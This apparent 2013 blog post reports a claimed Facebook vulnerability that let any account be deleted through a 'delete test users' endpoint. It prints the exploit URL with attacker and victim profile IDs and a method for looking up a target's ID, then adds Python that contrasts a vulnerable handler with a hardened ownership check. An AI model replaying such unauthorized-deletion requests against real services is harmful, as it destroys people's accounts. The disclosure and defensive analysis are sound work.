Thursday, 5 September 2013

Security researcher finds Vulnerability in Facebook which could delete any Facebook account but Facebook refuses to pay bounty

A security researcher from India named Ehraz Ahmed claims to have found a vulnerability that would let anyone delete any Facebook account; he emailed us the details of his latest bug.
Here is the complete process he says he used to delete a Facebook account:
Vulnerable link:

https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=[Victim's Profile ID]&__user=[Attacker's Profile ID]&__a=1

We can get the profile ID by using
http://graph.facebook.com/[username]

Here [username] is the username of your Facebook profile.

In this demo we will be using a test profile:
Name: Rahul Agnikotri
https://www.facebook.com/hexgroup (victim's profile; this is my test profile)

We can remove any account on Facebook, even Mark Zuckerberg's or any celebrity's.

  • Attacker's profile ID = 1781913563

  • Victim's profile ID = 100001831297334

https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1

He also uploaded a video demonstration of this vulnerability:
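The request above is the whole attack: the attacker supplies his own fb_dtsg (Facebook's per-session anti-CSRF token) and his own ID in __user, and simply names somebody else's ID in selected_users[0]. What the researcher is describing is therefore not a token bypass but a missing ownership check on the target IDs. The Python below is an added illustration of that class of flaw and is not Facebook's code: the parameter names and the two profile IDs are taken from the post, while the account store, the Session object, the created_by ownership rule and the handler names delete_vulnerable and delete_hardened are assumptions made for the example. The vulnerable handler validates only the token; the hardened one also binds __user to the authenticated session and refuses any target that is not a test user created by that same user.

```python
"""Model of the authorization gap in a 'delete test users' endpoint.

Added example, not Facebook's code. Request shape (fb_dtsg, selected_users[N],
__user) and the two IDs come from the post; everything else is assumed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# The exact request from the post (attacker 1781913563 targeting 100001831297334).
URL = ("https://www.facebook.com/ajax/whitehat/delete_test_users.php?"
       "fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334"
       "&__user=1781913563&__a=1")


@dataclass
class Account:
    uid: str
    is_test_user: bool = False
    created_by: Optional[str] = None  # assumed: who provisioned a test user


@dataclass
class Session:
    uid: str      # authenticated user, taken from the cookie, never from the URL
    fb_dtsg: str  # per-session anti-CSRF token


def parse_request(url: str) -> Dict[str, object]:
    """Extract fb_dtsg, __user and every selected_users[N] from the query string."""
    q = parse_qs(urlsplit(url).query)
    selected: List[str] = []
    for key in sorted(k for k in q if k.startswith("selected_users[")):
        selected.extend(q[key])
    return {
        "fb_dtsg": q.get("fb_dtsg", [""])[0],
        "__user": q.get("__user", [""])[0],
        "selected_users": selected,
    }


def delete_vulnerable(accounts: Dict[str, Account], session: Session, url: str) -> str:
    """Checks the CSRF token only and trusts __user and selected_users[] as sent."""
    req = parse_request(url)
    if req["fb_dtsg"] != session.fb_dtsg:
        return "bad token"
    for uid in req["selected_users"]:
        accounts.pop(uid, None)  # whatever ID the caller names gets deleted
    return "ok"


def delete_hardened(accounts: Dict[str, Account], session: Session, url: str) -> str:
    """Also binds __user to the session and each target to the caller's own test users."""
    req = parse_request(url)
    if req["fb_dtsg"] != session.fb_dtsg:
        return "bad token"
    if req["__user"] != session.uid:
        return "forbidden"  # the acting user must be the authenticated one
    targets = [accounts.get(uid) for uid in req["selected_users"]]
    for acct in targets:
        if acct is None or not acct.is_test_user or acct.created_by != session.uid:
            return "forbidden"  # reject the whole batch; nothing is deleted
    for acct in targets:
        del accounts[acct.uid]
    return "ok"


def fresh_accounts() -> Dict[str, Account]:
    """Constructed sample store: the two IDs from the post plus one genuine test user."""
    return {
        "1781913563": Account("1781913563"),                          # attacker
        "100001831297334": Account("100001831297334"),                # victim
        "900000000000001": Account("900000000000001", True, "1781913563"),  # assumed test user
    }


def run(handler) -> Dict[str, object]:
    """Replay the post's request, then a legitimate request against the attacker's own test user."""
    accounts = fresh_accounts()
    attacker = Session("1781913563", "AQA1E-WE")
    victim_result = handler(accounts, attacker, URL)
    own_url = URL.replace("100001831297334", "900000000000001")
    own_result = handler(accounts, attacker, own_url)
    return {
        "victim": victim_result,
        "victim_survives": "100001831297334" in accounts,
        "own_test_user": own_result,
        "test_user_gone": "900000000000001" not in accounts,
    }


if __name__ == "__main__":
    print("vulnerable:", run(delete_vulnerable))
    print("hardened:  ", run(delete_hardened))
```

Against the vulnerable handler the victim's real account disappears even though the token was valid; against the hardened handler the same URL is refused while the attacker can still delete a test user he created. Note that the hardened version rejects the whole batch rather than skipping bad IDs, so a mixed list cannot be used to probe which IDs exist.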
